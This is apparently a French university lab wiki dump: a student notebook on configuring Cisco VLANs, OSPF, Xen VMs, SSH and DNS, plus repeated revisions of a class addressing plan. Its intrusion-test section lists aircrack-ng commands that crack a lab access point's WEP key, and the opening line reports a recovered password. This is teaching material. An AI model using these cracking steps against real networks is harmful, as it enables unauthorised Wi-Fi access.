Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=56963TP sysres IMA5 2021/2022 G72021-12-13T14:55:14Z<p>Avercaem : /* PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 86400<br />
@ IN SOA ns.anosteke59.site. postmaster.anosteke59.site. (<br />
2021112901 ; serial number YYMMDDNN<br />
28800 ; Refresh<br />
7200 ; Retry<br />
864000 ; Expire<br />
86400 ; Min TTL<br />
)<br />
NS ns.anosteke59.site.<br />
NS ns6.gandi.net. <br />
$ORIGIN anosteke59.site.<br />
ns IN A 193.48.57.182<br />
www IN CNAME ns<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===<br />
<br />
=== Tests d’intrusion ===<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start NOM_DE_L_INTERFACE 3<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 3 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est ??? On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 3 --bssid ??? wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&diff=56595TP sysres IMA5sc 2021/20222021-11-29T15:14:34Z<p>Avercaem : /* Plan d'adressage */</p>
<hr />
<div>== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]<br />
| Andrei Florea / Julien Delabre<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]<br />
| Robin Lasserye / Aviran Tetia <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]<br />
| Axel Guillaume<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]<br />
| Selim Raphael<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]<br />
| Helene Camille<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]<br />
| Boris JACQUOT / Louis WADBLED<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]<br />
| Johnny Gouvaert / Arthur Vercaemst<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]<br />
| Mel Theo<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]<br />
| Khalil Alvare<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]<br />
| Souleyman Enoch<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]<br />
| Clément<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]<br />
| <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]<br />
| <br />
|}<br />
<br />
=Plan d'adressage=<br />
<br />
{| class="wikitable"<br />
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM <br />
|- <br />
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg<br />
|-<br />
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B1::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu<br />
|-<br />
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B2::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel<br />
|-<br />
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B3::0/64 || 10.03.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet<br />
|-<br />
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B4::0/64 || 10.04.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || Duff<br />
|-<br />
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B5::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose<br />
|-<br />
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B6::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke<br />
|- <br />
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B7::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || RinceCochon<br />
|-<br />
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B8::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B9::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || Panache<br />
|-<br />
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60BA::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || Corona<br />
|-<br />
| INTERCO || 531 || 192.168.222.72/29 || || || 192.168.222.7? || 192.168.222.75 || 192.168.222.7? || || &nbsp;<br />
|-<br />
| XEN || 42 || 193.48.57.160/28 || 2001:7A8:116E:60BF::0/64 || 193.48.57.190/28 2001:7A8:116E:60B0::F3/64 || 193.48.57.187/28 2001:7A8:116E:60B0::F0/64|| 193.48.57.188/28 2001:7A8:116E:60B0::F1/64 || 192.48.57.189/28 2001:7A8:116E:60B0::F2/64|| || &nbsp;<br />
|-<br />
|}<br />
<br />
Table du VLAN 42<br />
{| class="wikitable"<br />
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) <br />
|- <br />
| Andrei / Julien || 193.48.57.176/28 || &nbsp;<br />
|-<br />
| Robin / Aviran || 193.48.57.177/28 || &nbsp;<br />
|-<br />
| Axel / Guillaume || 193.48.57.178/28 || &nbsp;<br />
|-<br />
| Selim / Raphael || 193.48.57.179/28 || &nbsp;<br />
|-<br />
| Helene / Camille || 193.48.57.180/28 || &nbsp;<br />
|-<br />
| Boris / Louis || 193.48.57.181/28 || &nbsp;<br />
|-<br />
| Johnny / Arthur || 193.48.57.182/28 || &nbsp;<br />
|-<br />
| Mel / Theo || 193.48.57.183/28 || &nbsp;<br />
|-<br />
| Khalil / Alvare || 193.48.57.184/28 || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 193.48.57.185/28 || &nbsp;<br />
|-<br />
| Clement || 193.48.57.186/28 || &nbsp;<br />
|-<br />
|}<br />
<br />
<!--<br />
Note : <br />
<br />
'''à compléter '''<br />
{| class="wikitable"<br />
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2<br />
|-<br />
| ROUTEUR E304<br />
| <br />
| 193.48.57.187<br />
| <br />
| :: :F0<br />
| :: :F0<br />
| 10.NN.00.250<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR E306<br />
| <br />
| 193.48.57.188<br />
| <br />
| :: :F1<br />
| :: :F1<br />
| 10.NN.00.251<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR SR52<br />
| <br />
| 193.48.57.189<br />
| <br />
| :: :F2<br />
| :: :F2<br />
| 10.NN.00.252<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR FLOTTANTE<br />
| <br />
| 193.48.57.190<br />
| <br />
| :: :F3<br />
| :: :F3<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO 531 INTERCO-SA<br />
| <br />
| 192.168.222.40/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E304<br />
| <br />
| 192.168.222.41/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E306<br />
| <br />
| 192.168.222.42/29<br />
| <br />
| fe80::/10 ::2<br />
| fe80::/10 ::2<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO SR53<br />
| <br />
| 192.168.222.43/29<br />
| <br />
| fe80::/10 ::3<br />
| fe80::/10 ::3<br />
| <br />
| <br />
| <br />
| <br />
|}<br />
!--><br />
<br />
<br />
* Plan d'adressage IPv4 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
|<br />
|}<br />
<br />
* Plan d'adressage IPv6 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
<br />
|}<br />
<br />
=Architecture réseau=</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&diff=56594TP sysres IMA5sc 2021/20222021-11-29T15:14:16Z<p>Avercaem : /* Plan d'adressage */</p>
<hr />
<div>== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]<br />
| Andrei Florea / Julien Delabre<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]<br />
| Robin Lasserye / Aviran Tetia <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]<br />
| Axel Guillaume<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]<br />
| Selim Raphael<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]<br />
| Helene Camille<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]<br />
| Boris JACQUOT / Louis WADBLED<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]<br />
| Johnny Gouvaert / Arthur Vercaemst<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]<br />
| Mel Theo<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]<br />
| Khalil Alvare<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]<br />
| Souleyman Enoch<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]<br />
| Clément<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]<br />
| <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]<br />
| <br />
|}<br />
<br />
=Plan d'adressage=<br />
<br />
{| class="wikitable"<br />
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM <br />
|- <br />
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg<br />
|-<br />
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B1::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu<br />
|-<br />
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B2::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel<br />
|-<br />
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B3::0/64 || 10.03.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet<br />
|-<br />
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B4::0/64 || 10.04.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || Duff<br />
|-<br />
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B5::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose<br />
|-<br />
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B6::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke<br />
|- <br />
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B7::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || RinceCochon<br />
|-<br />
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B8::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B9::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || Panache<br />
|-<br />
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60BA::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || Corona<br />
|-<br />
| INTERCO || 531 || 192.168.222.72/29 || || || 192.168.222.74 || 192.168.222.75 || 192.168.222.76 || || &nbsp;<br />
|-<br />
| XEN || 42 || 193.48.57.160/28 || 2001:7A8:116E:60BF::0/64 || 193.48.57.190/28 2001:7A8:116E:60B0::F3/64 || 193.48.57.187/28 2001:7A8:116E:60B0::F0/64|| 193.48.57.188/28 2001:7A8:116E:60B0::F1/64 || 192.48.57.189/28 2001:7A8:116E:60B0::F2/64|| || &nbsp;<br />
|-<br />
|}<br />
<br />
Table du VLAN 42<br />
{| class="wikitable"<br />
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) <br />
|- <br />
| Andrei / Julien || 193.48.57.176/28 || &nbsp;<br />
|-<br />
| Robin / Aviran || 193.48.57.177/28 || &nbsp;<br />
|-<br />
| Axel / Guillaume || 193.48.57.178/28 || &nbsp;<br />
|-<br />
| Selim / Raphael || 193.48.57.179/28 || &nbsp;<br />
|-<br />
| Helene / Camille || 193.48.57.180/28 || &nbsp;<br />
|-<br />
| Boris / Louis || 193.48.57.181/28 || &nbsp;<br />
|-<br />
| Johnny / Arthur || 193.48.57.182/28 || &nbsp;<br />
|-<br />
| Mel / Theo || 193.48.57.183/28 || &nbsp;<br />
|-<br />
| Khalil / Alvare || 193.48.57.184/28 || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 193.48.57.185/28 || &nbsp;<br />
|-<br />
| Clement || 193.48.57.186/28 || &nbsp;<br />
|-<br />
|}<br />
<br />
<!--<br />
Note : <br />
<br />
'''à compléter '''<br />
{| class="wikitable"<br />
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2<br />
|-<br />
| ROUTEUR E304<br />
| <br />
| 193.48.57.187<br />
| <br />
| :: :F0<br />
| :: :F0<br />
| 10.NN.00.250<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR E306<br />
| <br />
| 193.48.57.188<br />
| <br />
| :: :F1<br />
| :: :F1<br />
| 10.NN.00.251<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR SR52<br />
| <br />
| 193.48.57.189<br />
| <br />
| :: :F2<br />
| :: :F2<br />
| 10.NN.00.252<br />
| <br />
| <br />
| <br />
|- <br />
| ROUTEUR FLOTTANTE<br />
| <br />
| 193.48.57.190<br />
| <br />
| :: :F3<br />
| :: :F3<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO 531 INTERCO-SA<br />
| <br />
| 192.168.222.40/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| 10.NN.00.253<br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E304<br />
| <br />
| 192.168.222.41/29<br />
| <br />
| fe80::/10 ::1<br />
| fe80::/10 ::1<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO E306<br />
| <br />
| 192.168.222.42/29<br />
| <br />
| fe80::/10 ::2<br />
| fe80::/10 ::2<br />
| <br />
| <br />
| <br />
| <br />
|- <br />
| Vlan INTERCO SR53<br />
| <br />
| 192.168.222.43/29<br />
| <br />
| fe80::/10 ::3<br />
| fe80::/10 ::3<br />
| <br />
| <br />
| <br />
| <br />
|}<br />
!--><br />
<br />
<br />
* Plan d'adressage IPv4 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
|<br />
|}<br />
<br />
* Plan d'adressage IPv6 :<br />
{| class="plan_addr"<br />
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2<br />
|-<br />
<br />
|}<br />
<br />
=Architecture réseau=</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&diff=56591TP sysres IMA5sc 2021/20222021-11-29T15:12:58Z<p>Avercaem : /* Plan d'adressage */</p>
<hr />
<div>== Répartition des binômes ==<br />
<br />
{| class="wikitable"<br />
! Cahier !! Elèves <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]<br />
| Andrei Florea / Julien Delabre<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]<br />
| Robin Lasserye / Aviran Tetia <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]<br />
| Axel Guillaume<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]<br />
| Selim Raphael<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]<br />
| Helene Camille<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]<br />
| Boris JACQUOT / Louis WADBLED<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]<br />
| Johnny Gouvaert / Arthur Vercaemst<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]<br />
| Mel Theo<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]<br />
| Khalil Alvare<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]<br />
| Souleyman Enoch<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]<br />
| Clément<br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]<br />
| <br />
|-<br />
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]<br />
| <br />
|}<br />
<br />
=Plan d'adressage=<br />
<br />
{| class="wikitable"<br />
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM <br />
|- <br />
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg<br />
|-<br />
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B1::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu<br />
|-<br />
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B2::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel<br />
|-<br />
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B3::0/64 || 10.03.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet<br />
|-<br />
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B4::0/64 || 10.04.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || Duff<br />
|-<br />
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B5::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose<br />
|-<br />
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B6::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke<br />
|- <br />
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B7::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || RinceCochon<br />
|-<br />
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B8::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &nbsp;<br />
|-<br />
| Souleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B9::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || Panache<br />
|-<br />
